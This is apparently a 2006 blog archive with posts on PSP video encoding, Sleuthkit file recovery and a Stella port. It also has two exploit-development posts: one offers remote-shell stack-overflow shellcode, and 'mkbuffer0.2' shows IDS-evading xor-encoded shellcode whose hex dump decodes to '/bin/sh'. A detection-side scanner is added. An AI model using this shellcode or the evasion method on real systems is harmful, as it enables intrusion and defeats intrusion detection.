Archive for January, 2006

January 22nd 2006

PSP Video Encoder with PMP support

Added support for the PMP container format used by PMP_MOD. The Perl-based muxer is included in this package.

To use the PMP container format you have to define these variables in the Python script.

  • PSPPMPPATH = "/psp/video"
  • PMPMUX = "pmpmuxer.pl"

Encode video: python psp.py -m pmp -i file.mpg

Encode video and clean up: python psp.py -m pmp -i file.mpg -c

Encode only 10 sec: python psp.py -m pmp -i file.mpg -c -d 10

Source


January 15th 2006

PSP Video Encoder

Made a quick and dirty Python script to convert videos and pictures for the PSP. I am using FFmpeg and ImageMagick. You have to edit these variables to make the script suitable for your system.

  • PSP_MOUNT = "/mnt/psp"
  • TMPFILE = "./pspvideo"
  • FFMPEG = "/usr/bin/ffmpeg"
  • CONVERT = "/usr/bin/convert"

The script will try to mount the PSP and guess the next free video filename, to avoid overwriting existing files. You can also specify '-c' to clean up the PSP before copying the files.

Encode video: python psp.py -m vid -i file.mpg

Encode video and clean up: python psp.py -m vid -i file.mpg -c

Encode only 10 sec: python psp.py -m vid -i file.mpg -c -d 10

Copy pictures to the PSP: python psp.py -m pic -i folder/

Source


January 15th 2006

Undelete with Sleuthkit

Wrote a little Bash script using Sleuthkit tools to recover a deleted file from a partition. Tested the script with ext2 and fat32 filesystems.

Set up a test image:

dd if=/dev/zero of=image bs=1k count=8192
mkfs.ext2 image
mount -o loop image /mnt/image
cp something /mnt/image
rm /mnt/image/something
sync
umount /mnt/image

Now you can start the script to find a token of the deleted file:

./find.sh image "Test"

The code for find.sh:

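#!/bin/sh
# find.sh - locate a deleted file in an image by a known token and dump its blocks.
# Uses the Sleuth Kit 2.x tool names; Sleuth Kit 3.0 and later renamed
# dls, dcalc and dcat to blkls, blkcalc and blkcat.

if [ $# -ne 2 ]
then
    echo "Usage: $0 image token"
    exit 1
fi

IMAGE=$1
TOKEN=$2
BSIZE=1024
TYPE="linux-ext2"
TMP="dls_$(date +%Y%d%m_%H%M%S)"

if [ ! -f "$IMAGE" ]
then
    echo "Cannot find $IMAGE"
    exit 1
fi

if [ -z "$TOKEN" ]
then
    echo "Please give search token"
    exit 1
fi

echo "--------------------------"
echo "Found deleted"
# List deleted entries, then extract all unallocated blocks into $TMP
fls -f "$TYPE" -rd "$IMAGE"
dls -f "$TYPE" "$IMAGE" > "$TMP"
# Printable strings with their decimal byte offset inside the dls output
strings -t d "$TMP" > "$TMP.str"
echo "--------------------------"
grep -i -e "$TOKEN" "$TMP.str"
echo "--------------------------"
printf "Select Offset:"
read -r n
# First matching line that also contains the selected offset; keep the offset column
ADDR=$(grep -i -e "$TOKEN" "$TMP.str" | grep -e "$n" | sed 's/^[ \t]*//' | head -n 1 | cut -d " " -f1)
if [ -z "$ADDR" ]
then
    echo "Nothing found for '$TOKEN'"
    exit 1
fi
echo "Found $ADDR"
# Byte offset in the dls output -> unit number in the dls output
OFFSET=$(echo "$ADDR / $BSIZE" | bc)
echo "Using Offset $OFFSET"
# Unit number in the dls output -> block address in the original image
BLOCK=$(dcalc -f "$TYPE" -u "$OFFSET" "$IMAGE")
echo "Using Block $BLOCK"
echo "----------------------------"
dcat -f "$TYPE" "$IMAGE" "$BLOCK"
echo
echo "----------------------------"
# Find the inode that owned the block and show its metadata
INODE=$(ifind -f "$TYPE" -d "$BLOCK" "$IMAGE")
echo "Found Inode $INODE"
istat -f "$TYPE" "$IMAGE" "$INODE"
# The last line of the istat output is taken as the list of direct blocks
BLOCKS=$(istat -f "$TYPE" "$IMAGE" "$INODE" | tail -n 1)
echo "---------------------------"
echo "Found Blocks $BLOCKS"
echo "---------------------------"
# $BLOCKS is left unquoted on purpose so it splits into one block per iteration
(for BLOCK in $BLOCKS
do
    dcat -f "$TYPE" "$IMAGE" "$BLOCK"
done) | tee "$TMP.found"
echo "---------------------------"
echo "Saved to $TMP.found"
echo "---------------------------"
rm -f "$TMP" "$TMP.str"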
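
Why the script needs the dcalc step, as an added example that is not part of the original script: the offsets reported by strings refer to the dls output, which holds only the unallocated blocks, so the unit number has to be mapped back to a block address in the image. The image layout, allocation set and function names below are constructed for illustration and model the tools' behaviour instead of calling them.

```python
# Added example: models the dls -> strings/grep -> dcalc steps on a constructed image.
BSIZE = 1024  # same block size the script assumes


def build_image(nblocks, allocated, deleted):
    """Constructed image: 'A' bytes in allocated blocks, zeros elsewhere,
    plus leftover data of deleted files in some unallocated blocks."""
    img = bytearray(nblocks * BSIZE)
    for b in allocated:
        img[b * BSIZE:(b + 1) * BSIZE] = b"A" * BSIZE
    for b, data in deleted.items():
        img[b * BSIZE:b * BSIZE + len(data)] = data
    return bytes(img)


def unallocated_stream(image, allocated):
    """Like dls: concatenate only the unallocated blocks, in image order."""
    nblocks = len(image) // BSIZE
    free = [b for b in range(nblocks) if b not in allocated]
    stream = b"".join(image[b * BSIZE:(b + 1) * BSIZE] for b in free)
    return stream, free


def locate(image, allocated, token):
    """Return (byte offset in stream, unit number, block address in image),
    or None when the token is not in unallocated space."""
    stream, free = unallocated_stream(image, allocated)
    off = stream.find(token)        # the offset strings -t d and grep give
    if off < 0:
        return None
    unit = off // BSIZE             # OFFSET=$(echo "$ADDR / $BSIZE" | bc)
    return off, unit, free[unit]    # dcalc -u: unit -> original block


ALLOCATED = {0, 1, 2, 4, 5}         # constructed allocation map
IMAGE = build_image(8, ALLOCATED, {6: b"Test file contents\n"})

if __name__ == "__main__":
    print(locate(IMAGE, ALLOCATED, b"Test"))
```

Unit 1 of the unallocated stream is block 6 of the image here, which is why dividing the offset by the block size alone does not give a usable block address.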



January 10th 2006

InlineEgg Shellcode

Made a nice shellcode using the Python InlineEgg library. The shellcode is designed to smash the stack of a program which is listening on a socket. The read buffer gets overflowed by the shellcode. The code was tested on an older SUSE 9.0, because current distros use PIE and SSP.

Features:

  • Python script that generates the shellcode
  • Re-uses the listen socket of the victim and connects it to a new shell
  • Scans for correct fd and peername
  • Embedded Telnet client which connects to the created remote shell
  • Encoder to generate polymorphic shellcode

    Download


January 6th 2006

Stella 2.0 Update

Updated the PSP build to reflect the latest changes of the Stella project. This build is done with revision 1654 of pspsdk and libsdl.

Changelog

  • libsdl links against GL
  • Loader menu has simplified navigation

Building

To build for the PSP, make sure psp-config is in the path and run:


   ./configure --host=psp 
   make
   make psp-layout
   make psp-upload

Dependencies

Download

Source


January 5th 2006

mkbuffer0.2

Updated my shellcode generation tool. Added shellcode encryption to hide from IDSs which scan for well-known strings in the shellcode, like '/bin/sh'. The encryption is quite simple: just add, sub, xor or move by a fixed offset. The tool also adds a hook to decode the shellcode before it gets called.

Changelog:

  • Use getopt for command line parsing
  • Fixed off by one bug in hex dump output
  • Added simple shellcode encryption

./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
------------------------------------------------------
Start: 0x0x80499a0
End:   0x0x80499c9
Len:   0x0029 (41 bytes)
jump:  0x00000000
------------------------------------------------------
Crypt Shellcode 'xor' offset='2'
------------------------------------------------------
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
------------------------------------------------------
Writing Shellcode to 'CODE'
------------------------------------------------------
Starting Subshell
setup env $CODE
------------------------------------------------------
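
From the detection side, an added example that is not part of mkbuffer or the original post: because the encoding is a fixed per-byte offset, a scanner can undo every xor and add/sub key and then apply the same string signatures. The function names and the signature list are assumptions, the sample row is copied from the dump above, and the "move" mode is not covered.

```python
# Added example (detection side): undo fixed-offset xor/add/sub encodings
# and search the result for strings a plain-text signature would look for.
SIGNATURES = (b"/bin/sh", b"/bin/bash")   # assumed signature list


def _tables():
    """Yield (name, key, 256-byte translation table that undoes the encoding)."""
    yield "plain", 0, bytes(range(256))
    for key in range(1, 256):
        yield "xor", key, bytes(b ^ key for b in range(256))
        # Encoding with "sub k" is the same byte map as "add 256 - k",
        # so undoing every additive key covers both modes.
        yield "add", key, bytes((b - key) & 0xFF for b in range(256))


def scan(payload, signatures=SIGNATURES):
    """Return a list of (transform, key, signature, offset) for every hit."""
    hits = []
    for name, key, table in _tables():
        decoded = payload.translate(table)
        for sig in signatures:
            pos = decoded.find(sig)
            while pos != -1:
                hits.append((name, key, sig, pos))
                pos = decoded.find(sig, pos + 1)
    return hits


# One 16-byte row copied from the hex dump in the tool output above.
PAGE_ROW = bytes.fromhex("33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a")

if __name__ == "__main__":
    for hit in scan(PAGE_ROW):
        print(hit)
```

The plain signature does not match the row, but the xor pass with key 2 (the offset passed with -o 2) recovers '/bin/sh' at byte 9.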


Download
